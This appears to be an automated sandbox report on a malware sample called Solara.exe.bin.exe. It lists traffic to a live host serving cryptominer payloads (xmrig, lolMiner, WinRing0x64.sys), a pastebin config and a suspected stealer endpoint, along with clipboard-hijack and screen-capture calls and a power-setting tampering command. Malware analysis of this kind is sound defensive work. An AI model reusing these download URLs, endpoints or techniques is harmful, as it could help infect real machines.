                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: citydisco.bet
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 920414978f665e6c-EWR
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exe
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.drString found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exeP
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sys
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.drString found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636763357.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2171791456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2170565679.0000000000BAA000.00000004.00000010.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636824557.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172359493.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe#
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe&
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/lolMiner.exe
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exe
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exeP
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51:80/conhost.exe$
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51D
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: svchost.exe, 00000015.00000002.2175338352.000001B3D1C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.21.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1065158096.0000000005271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 0000000B.00000002.1065158096.0000000005271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBLr
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
                  Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017955007.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017854768.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974473104.000000000123F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996006601.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974386344.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/02
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/f3
                  Source: Solara.exe.bin.exe, 00000002.00000003.996726708.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
                  Source: Solara.exe.bin.exe, 00000002.00000003.956119980.0000000001261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISdtzYrvZ
                  Source: Solara.exe.bin.exe, 00000002.00000003.968762144.000000000125D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISjkJvr
                  Source: Solara.exe.bin.exe, 00000002.00000003.933316284.000000000127E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.944716041.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISre
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS
                  Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017955007.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017854768.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996006601.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJISNz
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: edb.log.21.dr, qmgr.db.21.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000015.00000003.1204211365.000001B3D1A00000.00000004.00000800.00020000.00000000.sdmp, edb.log.21.dr, qmgr.db.21.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000B.00000002.1065158096.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1065158096.0000000005BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp, logs.uce1.8.dr, logs.uce.8.dr, logs.uce0.8.drString found in binary or memory: https://pastebin.com/raw/YpJeSRBC
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                  Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: Solara.exe.bin.exe, 00000002.00000003.957678616.0000000003612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49690 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49691 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49692 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E5B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_03451000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_03451000
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E5B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0043F276

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009164600_2_00916460
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D553B0_2_008D553B
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00914CB00_2_00914CB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F1F500_2_008F1F50
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009160900_2_00916090
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092E0F00_2_0092E0F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009290F00_2_009290F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093B0F00_2_0093B0F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E50E00_2_008E50E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F00E00_2_008F00E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EA0F00_2_008EA0F0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009260100_2_00926010
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D10000_2_008D1000
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093A0300_2_0093A030
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FE0200_2_008FE020
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008DE0300_2_008DE030
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092C0500_2_0092C050
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0090D0700_2_0090D070
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0092D0700_2_0092D070
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008EF1900_2_008EF190
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E01A00_2_008E01A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009341D00_2_009341D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D41D00_2_008D41D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009001100_2_00900110
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009241100_2_00924110
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009081300_2_00908130
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E91500_2_008E9150
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009071700_2_00907170
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008F52900_2_008F5290
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009312B00_2_009312B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008E82B00_2_008E82B0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009422CA0_2_009422CA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D72E00_2_008D72E0
